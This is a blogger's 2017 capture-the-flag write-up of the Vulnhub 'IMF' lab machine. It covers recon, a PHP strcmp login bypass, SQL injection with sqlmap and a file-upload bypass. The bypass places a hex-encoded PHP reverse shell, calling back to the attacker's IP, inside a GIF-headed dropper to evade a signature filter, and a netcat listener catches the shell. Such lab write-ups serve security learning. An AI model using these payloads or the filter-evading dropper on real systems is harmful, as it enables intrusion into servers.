IMF (5 of 6 flags)

Welcome to my first CTF virtual machine writeup. I downloaded the virtual machine file from Vulnhub The description doesn’t give much away:

Welcome to “IMF”, my first Boot2Root virtual machine. IMF is a intelligence agency that you must hack to get all flags and ultimately root. The flags start off easy and get harder as you progress. Each flag contains a hint to the next flag. I hope you enjoy this VM and learn something.

Recon and first two flags

First I decided to scan for open ports and running services using nmap:

nmap -sS -sV -O -A -p- 192.168.0.100
[...]
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF - Homepage

There seems to be only one service running on the target and it looks like a HTTP server. So I fire up browser to see webpage which seems to be some kind of landing page for intelligence agency: IMF landing page So where can I start? Skimming through sources of the page two things caught my attention. First were the names of three script files linked:

<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>

Especially last one looks a lot like base64 encoded but unfortunately it doesn’t decode well to anything readable. I made note of that to be sure to come back to that. It didn’t have to wait too long. In HTML comments from contacts.php I find the first flag:

flag1{YWxsdGhlZmlsZXM=}

It decodes to allthefiles which immediatly points me back to script file names. The trick is to merge all three names into one base64 string. After decoding we have second flag:

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

Third flag

Flag 2 decodes to imfadministrator, could it be hidden folder on webserver? You bet it is! Under /imfadministrator we find simple login form:

<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->
</form>

Comment under login form claims that ‘Roger’ couldn’t get the sql working so he hardcoded the password. Trying some generic logins like ‘admin’ I got the ‘Invalid username.’ response. So there is a chance that if I get login right the site will tell me.

Tried admin and some combinations of roger, author of the comment but no luck. Then I remembered the /contact.php page. There is email rmichaels@imf.local for Roger so I figured it’s his login. Now the page says the ‘Invalid password’, so I’m on the good track.

How to break super-safe hardcoded password? Well, all you need to do is to do is to pass argument as an array in post request, like this:

user=rmichaels&pass[]=

Why this works? Probably ‘Roger’ used PHP function ‘strcmp’ which returns 0 both on equal strings and error. So when it got array instead of string it let us bypass the password check and returned third flag:

flag3{Y29udGludWVUT2Ntcw==}<br />Welcome, rmichaels<br /><a href='cms.php?pagename=home'>IMF CMS</a>

Fourth flag

Decoding flag 3 yields ‘continueTOcms’ hint which is kinda obvious given it’s the only link we see.

The CMS seems to be a simple webapplication where content is chosen upon a value of GET parameter ‘pagename’. I tested it for some Local File Inclusion with no luck so I turned to SQL Injection with better results:

imfadministrator/cms.php?pagename=disavowlist’

Warning: mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/imfadministrator/cms.php on line 29

So the parameter pagename seems to be vulnerable. I fire up sqlmap to get more information on database:

sqlmap -u http://192.168.0.100/imfadministrator/cms.php?pagename=upload -p pagename --cookie='PHPSESSID=3mvrp5pc12ga959mdjo4vr6n61' --tables
[...]
Database: admin
[1 table]
+------------------------------------------------------+
| pages                                                |
+------------------------------------------------------+

Admin database looks interesting. Lets see what’s inside:

sqlmap -u http://192.168.0.100/imfadministrator/cms.php?pagename=upload -p pagename --cookie='PHPSESSID=3mvrp5pc12ga959mdjo4vr6n61' --dump admin

Database: admin
Table: pages
[4 entries]
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | pagename             | pagedata                                                                                                                                                              |
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | upload               | Under Construction.                                                                                                                                                   |
| 2  | home                 | Welcome to the IMF Administration.                                                                                                                                    |
| 3  | tutorials-incomplete | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training.                                                               |
| 4  | disavowlist          | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary |
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

We find one more, hidden site in database. But no visible flag just yet. Downloading whiteboard image reveals QR code: IMF landing page

To decode the QR code I used zbar-tools package:

barimg whiteboard.jpg 
QR-Code:flag4{dXBsb2Fkcjk0Mi5waHA=}
scanned 1 barcode symbols from 1 images in 0.08 seconds

Fifth flag

Yay! Another flag! It decodes to uploadr942.php. Navigating to /imfadministrator/uploadr942.php reveals simple file uploader. Couple minutes of fiddling with different samples of files revealed that the server allows only graphic files. So where do they go? After uploading sample file I found a comment in HTML file:

<h1>Intelligence Upload Form</h1> 
File successfully uploaded.
<!-- 574f82093c71 --><form id="Upload" action="" enctype="multipart/form-data" method="post">
	<p> 
		<label for="file">File to upload:</label>
		<input id="file" type="file" name="file">
	</p>
          
    <p>
    	<input id="submit" type="submit" name="submit" value="Upload">
    </p>
</form>

After a moment of trial and error the I found the file found under the /imfadministrator/uploads/574f82093c71.jpg path. I decide to try exploit this knowledge to run some PHP code on the server.

GIF98

<?php
phpinfo();
?>

First test seemed to be promising since it succeded to display phpinfo in browser. Unofrtunatetly, uploading php_reverse_shell failed:

Error: CrappyWAF detected malware. Signature: fsockopen php function detected

Looks like besided filtering files by type it scans them for some ‘dangerous’ php functions filters them out. Now the question is how big the firewall’s blacklist is.

After some more experimenting I found out that the firewall does allow file_put_contents function, so I decided to obfuscate actual payload as hex string inside a PHP file dropper:

#Copy php_reverse_shell payload to working dir
cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
# Set proper host in reverse_shell.php
# Encode paylod as hex
cat reverse-shell.php | xxd -p | tr -d [:space:] > payloadhex.txt
#Wrap it in php dropper and add GIF98 header to fool filter.

Final payload looks like this:

GIF98

<?php
file_put_contents("backdoor.php", hex2bin("3c3f7068700a2f2f207068702d726576657273652d7368656c6c202d20412052657665727365205368656c6c20696d706c656d656e746174696f6e20696e205048500a2f2f20436f707972696768742028432920323030372070656e746573746d6f6e6b65794070656e746573746d6f6e6b65792e6e65740a2f2f0a2f2f205468697320746f6f6c206d6179206265207573656420666f72206c6567616c20707572706f736573206f6e6c792e202055736572732074616b652066756c6c20726573706f6e736962696c6974790a2f2f20666f7220616e7920616374696f6e7320706572666f726d6564207573696e67207468697320746f6f6c2e202054686520617574686f722061636365707473206e6f206c696162696c6974790a2f2f20666f722064616d61676520636175736564206279207468697320746f6f6c2e20204966207468657365207465726d7320617265206e6f742061636365707461626c6520746f20796f752c207468656e0a2f2f20646f206e6f7420757365207468697320746f6f6c2e0a2f2f0a2f2f20496e20616c6c206f74686572207265737065637473207468652047504c2076657273696f6e2032206170706c6965733a0a2f2f0a2f2f20546869732070726f6772616d206973206672656520736f6674776172653b20796f752063616e2072656469737472696275746520697420616e642f6f72206d6f646966790a2f2f20697420756e64657220746865207465726d73206f662074686520474e552047656e6572616c205075626c6963204c6963656e73652076657273696f6e20322061730a2f2f207075626c697368656420627920746865204672656520536f66747761726520466f756e646174696f6e2e0a2f2f0a2f2f20546869732070726f6772616d20697320646973747269627574656420696e2074686520686f706520746861742069742077696c6c2062652075736566756c2c0a2f2f2062757420574954484f555420414e592057415252414e54593b20776974686f7574206576656e2074686520696d706c6965642077617272616e7479206f660a2f2f204d45524348414e544142494c495459206f72204649544e45535320464f52204120504152544943554c415220505552504f53452e2020536565207468650a2f2f20474e552047656e6572616c205075626c6963204c6963656e736520666f72206d6f72652064657461696c732e0a2f2f0a2f2f20596f752073686f756c642068617665207265636569766564206120636f7079206f662074686520474e552047656e6572616c205075626c6963204c6963656e736520616c6f6e670a2f2f207769746820746869732070726f6772616d3b206966206e6f742c20777269746520746f20746865204672656520536f66747761726520466f756e646174696f6e2c20496e632e2c0a2f2f203531204672616e6b6c696e205374726565742c20466966746820466c6f6f722c20426f73746f6e2c204d412030323131302d31333031205553412e0a2f2f0a2f2f205468697320746f6f6c206d6179206265207573656420666f72206c6567616c20707572706f736573206f6e6c792e202055736572732074616b652066756c6c20726573706f6e736962696c6974790a2f2f20666f7220616e7920616374696f6e7320706572666f726d6564207573696e67207468697320746f6f6c2e20204966207468657365207465726d7320617265206e6f742061636365707461626c6520746f0a2f2f20796f752c207468656e20646f206e6f7420757365207468697320746f6f6c2e0a2f2f0a2f2f20596f752061726520656e636f75726167656420746f2073656e6420636f6d6d656e74732c20696d70726f76656d656e7473206f722073756767657374696f6e7320746f0a2f2f206d652061742070656e746573746d6f6e6b65794070656e746573746d6f6e6b65792e6e65740a2f2f0a2f2f204465736372697074696f6e0a2f2f202d2d2d2d2d2d2d2d2d2d2d0a2f2f2054686973207363726970742077696c6c206d616b6520616e206f7574626f756e642054435020636f6e6e656374696f6e20746f20612068617264636f64656420495020616e6420706f72742e0a2f2f2054686520726563697069656e742077696c6c20626520676976656e2061207368656c6c2072756e6e696e67206173207468652063757272656e7420757365722028617061636865206e6f726d616c6c79292e0a2f2f0a2f2f204c696d69746174696f6e730a2f2f202d2d2d2d2d2d2d2d2d2d2d0a2f2f2070726f635f6f70656e20616e642073747265616d5f7365745f626c6f636b696e672072657175697265205048502076657273696f6e20342e332b2c206f7220352b0a2f2f20557365206f662073747265616d5f73656c6563742829206f6e2066696c652064657363726970746f72732072657475726e65642062792070726f635f6f70656e28292077696c6c206661696c20616e642072657475726e2046414c534520756e6465722057696e646f77732e0a2f2f20536f6d6520636f6d70696c652d74696d65206f7074696f6e7320617265206e656564656420666f72206461656d6f6e69736174696f6e20286c696b652070636e746c2c20706f736978292e202054686573652061726520726172656c7920617661696c61626c652e0a2f2f0a2f2f2055736167650a2f2f202d2d2d2d2d0a2f2f2053656520687474703a2f2f70656e746573746d6f6e6b65792e6e65742f746f6f6c732f7068702d726576657273652d7368656c6c20696620796f752067657420737475636b2e0a0a7365745f74696d655f6c696d6974202830293b0a2456455253494f4e203d2022312e30223b0a246970203d20273139322e3136382e302e3130273b20202f2f204348414e474520544849530a24706f7274203d20313233343b202020202020202f2f204348414e474520544849530a246368756e6b5f73697a65203d20313430303b0a2477726974655f61203d206e756c6c3b0a246572726f725f61203d206e756c6c3b0a247368656c6c203d2027756e616d65202d613b20773b2069643b202f62696e2f7368202d69273b0a246461656d6f6e203d20303b0a246465627567203d20303b0a0a2f2f0a2f2f204461656d6f6e697365206f757273656c6620696620706f737369626c6520746f2061766f6964207a6f6d62696573206c617465720a2f2f0a0a2f2f2070636e746c5f666f726b20697320686172646c79206576657220617661696c61626c652c206275742077696c6c20616c6c6f7720757320746f206461656d6f6e6973650a2f2f206f7572207068702070726f6365737320616e642061766f6964207a6f6d626965732e2020576f7274682061207472792e2e2e0a6966202866756e6374696f6e5f657869737473282770636e746c5f666f726b272929207b0a092f2f20466f726b20616e6420686176652074686520706172656e742070726f6365737320657869740a0924706964203d2070636e746c5f666f726b28293b0a090a096966202824706964203d3d202d3129207b0a09097072696e74697428224552524f523a2043616e277420666f726b22293b0a0909657869742831293b0a097d0a090a09696620282470696429207b0a0909657869742830293b20202f2f20506172656e742065786974730a097d0a0a092f2f204d616b65207468652063757272656e742070726f6365737320612073657373696f6e206c65616465720a092f2f2057696c6c206f6e6c79207375636365656420696620776520666f726b65640a0969662028706f7369785f7365747369642829203d3d202d3129207b0a09097072696e74697428224572726f723a2043616e277420736574736964282922293b0a0909657869742831293b0a097d0a0a09246461656d6f6e203d20313b0a7d20656c7365207b0a097072696e74697428225741524e494e473a204661696c656420746f206461656d6f6e6973652e20205468697320697320717569746520636f6d6d6f6e20616e64206e6f7420666174616c2e22293b0a7d0a0a2f2f204368616e676520746f20612073616665206469726563746f72790a636864697228222f22293b0a0a2f2f2052656d6f766520616e7920756d61736b20776520696e686572697465640a756d61736b2830293b0a0a2f2f0a2f2f20446f207468652072657665727365207368656c6c2e2e2e0a2f2f0a0a2f2f204f70656e207265766572736520636f6e6e656374696f6e0a24736f636b203d2066736f636b6f70656e282469702c2024706f72742c20246572726e6f2c20246572727374722c203330293b0a696620282124736f636b29207b0a097072696e7469742822246572727374722028246572726e6f2922293b0a09657869742831293b0a7d0a0a2f2f20537061776e207368656c6c2070726f636573730a2464657363726970746f7273706563203d206172726179280a20202030203d3e206172726179282270697065222c20227222292c20202f2f20737464696e20697320612070697065207468617420746865206368696c642077696c6c20726561642066726f6d0a20202031203d3e206172726179282270697065222c20227722292c20202f2f207374646f757420697320612070697065207468617420746865206368696c642077696c6c20777269746520746f0a20202032203d3e206172726179282270697065222c20227722292020202f2f2073746465727220697320612070697065207468617420746865206368696c642077696c6c20777269746520746f0a293b0a0a2470726f63657373203d2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c20247069706573293b0a0a696620282169735f7265736f75726365282470726f636573732929207b0a097072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0a09657869742831293b0a7d0a0a2f2f205365742065766572797468696e6720746f206e6f6e2d626c6f636b696e670a2f2f20526561736f6e3a204f636373696f6e616c6c792072656164732077696c6c20626c6f636b2c206576656e2074686f7567682073747265616d5f73656c6563742074656c6c73207573207468657920776f6e27740a73747265616d5f7365745f626c6f636b696e67282470697065735b305d2c2030293b0a73747265616d5f7365745f626c6f636b696e67282470697065735b315d2c2030293b0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c2030293b0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0a0a7072696e74697428225375636365737366756c6c79206f70656e65642072657665727365207368656c6c20746f202469703a24706f727422293b0a0a7768696c6520283129207b0a092f2f20436865636b20666f7220656e64206f662054435020636f6e6e656374696f6e0a096966202866656f662824736f636b2929207b0a09097072696e74697428224552524f523a205368656c6c20636f6e6e656374696f6e207465726d696e6174656422293b0a0909627265616b3b0a097d0a0a092f2f20436865636b20666f7220656e64206f66205354444f55540a096966202866656f66282470697065735b315d2929207b0a09097072696e74697428224552524f523a205368656c6c2070726f63657373207465726d696e6174656422293b0a0909627265616b3b0a097d0a0a092f2f205761697420756e74696c206120636f6d6d616e6420697320656e6420646f776e2024736f636b2c206f7220736f6d650a092f2f20636f6d6d616e64206f757470757420697320617661696c61626c65206f6e205354444f5554206f72205354444552520a0924726561645f61203d2061727261792824736f636b2c202470697065735b315d2c202470697065735b325d293b0a09246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c6c293b0a0a092f2f2049662077652063616e20726561642066726f6d207468652054435020736f636b65742c2073656e640a092f2f206461746120746f2070726f63657373277320535444494e0a0969662028696e5f61727261792824736f636b2c2024726561645f612929207b0a09096966202824646562756729207072696e7469742822534f434b205245414422293b0a090924696e707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0a09096966202824646562756729207072696e7469742822534f434b3a2024696e70757422293b0a0909667772697465282470697065735b305d2c2024696e707574293b0a097d0a0a092f2f2049662077652063616e20726561642066726f6d207468652070726f636573732773205354444f55540a092f2f2073656e64206461746120646f776e2074637020636f6e6e656374696f6e0a0969662028696e5f6172726179282470697065735b315d2c2024726561645f612929207b0a09096966202824646562756729207072696e74697428225354444f5554205245414422293b0a090924696e707574203d206672656164282470697065735b315d2c20246368756e6b5f73697a65293b0a09096966202824646562756729207072696e74697428225354444f55543a2024696e70757422293b0a09096677726974652824736f636b2c2024696e707574293b0a097d0a0a092f2f2049662077652063616e20726561642066726f6d207468652070726f636573732773205354444552520a092f2f2073656e64206461746120646f776e2074637020636f6e6e656374696f6e0a0969662028696e5f6172726179282470697065735b325d2c2024726561645f612929207b0a09096966202824646562756729207072696e7469742822535444455252205245414422293b0a090924696e707574203d206672656164282470697065735b325d2c20246368756e6b5f73697a65293b0a09096966202824646562756729207072696e74697428225354444552523a2024696e70757422293b0a09096677726974652824736f636b2c2024696e707574293b0a097d0a7d0a0a66636c6f73652824736f636b293b0a66636c6f7365282470697065735b305d293b0a66636c6f7365282470697065735b315d293b0a66636c6f7365282470697065735b325d293b0a70726f635f636c6f7365282470726f63657373293b0a0a2f2f204c696b65207072696e742c2062757420646f6573206e6f7468696e67206966207765277665206461656d6f6e69736564206f757273656c660a2f2f2028492063616e277420666967757265206f757420686f7720746f207265646972656374205354444f5554206c696b6520612070726f706572206461656d6f6e290a66756e6374696f6e207072696e746974202824737472696e6729207b0a096966202821246461656d6f6e29207b0a09097072696e74202224737472696e675c6e223b0a097d0a7d0a0a3f3e200a0a0a0a"));
?>

After uploading a file we can navigate to a dropper (remember to check the name of the file in the HTML comment) and after running a dropper we can setup a listener on attackers machine:

nc -lp 1234

If everything went right navigating to

/msfadministrator/uploads/backdoor.php

should give us a a shell:

Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 15:53:41 up  2:42,  0 users,  load average: 0.11, 0.12, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Great! We have a shell! But where is the flag? I roamed through the filesystem for a while until I decided to look to uploads dirctory:

$ cd /var/www/html/imfadministrator/uploads
$ ls -al
total 252
drwxr-xr-x 2 www-data www-data  4096 Jun 18 05:35 .
drwxr-xr-x 4 www-data www-data  4096 Oct 17  2016 ..
-rw-r--r-- 1 www-data www-data    82 Oct 12  2016 .htaccess
-rw-r--r-- 1 www-data www-data  6074 Jun  6 13:01 048cc0ba197b.gif
-rw-r--r-- 1 www-data www-data    27 Jun  2 10:53 15d75ca3b468.gif
-rw-r--r-- 1 www-data www-data 11052 Jun  7 13:36 29ab56559292.gif
-rw-r--r-- 1 www-data www-data    27 Jun 18 05:35 36e021ae6072.gif
-rw-r--r-- 1 www-data www-data  6061 Jun  6 10:57 4688d3be2edf.gif
-rw-r--r-- 1 www-data www-data 11052 Jun 18 05:28 574f82093c71.gif
-rw-r--r-- 1 www-data www-data 45944 Jun  2 10:49 66024f4e10de.jpg
-rw-r--r-- 1 www-data www-data  6089 Jun  6 10:59 825abef8c60f.gif
-rw-r--r-- 1 www-data www-data    28 Jun 18 05:33 829aa413082a.gif
-rw-r--r-- 1 www-data www-data  5494 Jun  7 13:37 backdoor.php
-rw-r--r-- 1 www-data www-data 58816 Jun  1 13:09 bd580392b826.jpg
-rw-r--r-- 1 www-data www-data 58816 Jun  1 13:00 c4e76ada9220.jpg
-rw-r--r-- 1 www-data www-data    28 Oct 12  2016 flag5_abc123def.txt #YAY!
$ cat flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}

Summary

That’s all I have for now. I hope I’ll manage to get the last remaining flag soon.

I hope you enjoyed this writeup!

Flags

flag1{YWxsdGhlZmlsZXM=}
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
flag3{Y29udGludWVUT2Ntcw==}
flag4{dXBsb2Fkcjk0Mi5waHA=}
flag5{YWdlbnRzZXJ2aWNlcw==}
Written on June 18, 2017